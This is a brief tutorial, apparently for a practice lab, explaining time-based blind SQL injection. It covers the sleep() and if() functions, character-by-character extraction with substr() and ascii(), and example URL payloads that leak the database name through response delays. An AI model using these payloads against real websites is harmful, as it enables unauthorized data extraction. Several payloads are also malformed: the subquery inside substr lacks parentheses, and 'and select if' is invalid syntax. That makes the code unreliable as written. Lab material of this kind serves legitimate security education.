Table of contents
1. Overview of Time Blind Injection
1. Overview of Time Blind Injection
The web page just returns a normal page. Use the difference in page response time to guess the data one by one. But the premise is that the database will execute the command code, but it will not feed back the page information.
review:
When the page has an echo, choose union injection;
When the page is not echoed but there is an error message, select error injection;
When the page neither echoes nor reports an error, but has a page true or false value, select Boolean blind;
No echo, no error, no page true and false value, choose time blind;
Second, the key function
sleep()
The function sleep() parameter is the sleep time, in seconds, which can be a decimal
if()
function if(condition,true,false)
condition is the condition, true is the value returned when the condition is true, and false is the value returned when the condition is false
For example:
select if(1=1,sleep(0),sleep(3));
1=1 is true, execute sleep for 0 seconds
Three, injection principle
The function of substr((),1,1) is: display a letter from the first letter
Judging whether the condition is true (ratio size) by different response time lengths
select if(ascii(substr(select database(),1,1))>100,sleep(0),sleep(3));
Four, examples
Take less-9 as an example:
Calculate whether the previous guess is correct based on the response time of the page
?id=1' and select if(ascii(substr(select database(),1,1))>115,sleep(0),sleep(3)) --+
After this, we can change the substr argument to impute the second letter, and from that, extrapolate the second letter until we get the result:
?id=1' and select if(ascii(substr(select database(),2,1))>115,sleep(0),sleep(3)) --+
